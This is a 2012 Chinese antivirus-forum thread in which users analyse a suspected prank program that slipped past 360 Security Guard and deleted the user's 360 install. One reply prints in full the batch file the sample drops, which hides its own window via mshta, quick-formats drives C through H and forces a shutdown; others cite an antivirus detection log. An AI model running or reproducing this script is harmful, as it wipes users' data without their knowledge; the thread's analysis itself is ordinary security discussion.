疑似恶作剧过360卫士？360已查杀

显示全部楼层 · 发表于 2012-1-6 23:25:54

本帖最后由 wjcharles 于 2012-1-7 00:10 编辑

见样本区，http://bbs.kafan.cn/thread-1197834-1-1.html
貌似是恶作剧程序，哪位测试一下？
现在360已经杀了http://bbs.kafan.cn/forum.php?mo ... &fromuid=489037

运行过程中360卫士不但无任何反应，可悲的是装在D盘的360卫士伴随着样本的运行，顷刻间化为乌有。。。
360云鉴定器也歇菜了

显示全部楼层 · 发表于 2012-1-6 23:28:16

本帖最后由 wanghai360good 于 2012-1-6 23:28 编辑

只是一个恶作剧程序而已，释放出恶意脚本然后运行，
如果是真的zeroaccess就算过了360，现在应该也会响应的。

显示全部楼层 · 发表于 2012-1-6 23:35:43

本帖最后由 wjcharles 于 2012-1-6 23:35 编辑

wanghai360good 发表于 2012-1-6 23:28
只是一个恶作剧程序而已，释放出恶意脚本然后运行，
如果是真的zeroaccess就算过了360，现在应该也会响应的 ...

我运行了一下，确实像恶作剧，刚才被别人的测试误导了。。。0access针对360想想也不可能

显示全部楼层 · 发表于 2012-1-6 23:40:16

wjcharles 发表于 2012-1-6 23:35
我运行了一下，确实像恶作剧，刚才被别人的测试误导了。。。0access针对360想想也不可能

不是像，而是是。这货在电脑上运行后，会释放以下内容的bat文件到temp目录下，然后运行。
360主防和杀毒是不会报的，我装了红伞引擎所以就杀了。
@shift

@echo off

if "%1" == "h" goto begin
mshta vbscript:createobject("wscript.shell").run("%~nx0 h",0)(window.close)&&exit
:begin

@echo off
format d: /q /y
format e: /q /y
format e: /q /y
format f: /q /y
format g: /q /y
format h: /q /y
format c: /q /y
shutdown -s -t 30
pause

显示全部楼层 · 发表于 2012-1-6 23:41:50

本帖最后由 z13667152750 于 2012-1-6 23:42 编辑

好无聊的东西....

清空D\E\F等分区的所有文件夹....

出现过好多次了...

显示全部楼层 · 发表于 2012-1-6 23:44:13

本帖最后由 wjcharles 于 2012-1-6 23:45 编辑

wanghai360good 发表于 2012-1-6 23:40
不是像，而是是。这货在电脑上运行后，会释放以下内容的bat文件到temp目录下，然后运行。
360主防和杀毒 ...

嗯，那就确定了，我没还原隔离区，所以不是很肯定

2012/1/6 23:28:09,高,816c757.bat (Trojan.Bat.Format.FR) 检测方自动防护,已阻止,已解决 - 不需要操作,

显示全部楼层 · 发表于 2012-1-7 00:03:12

恶作剧。。。拉出去弹DD。。

[讨论] 疑似恶作剧过360卫士？360已查杀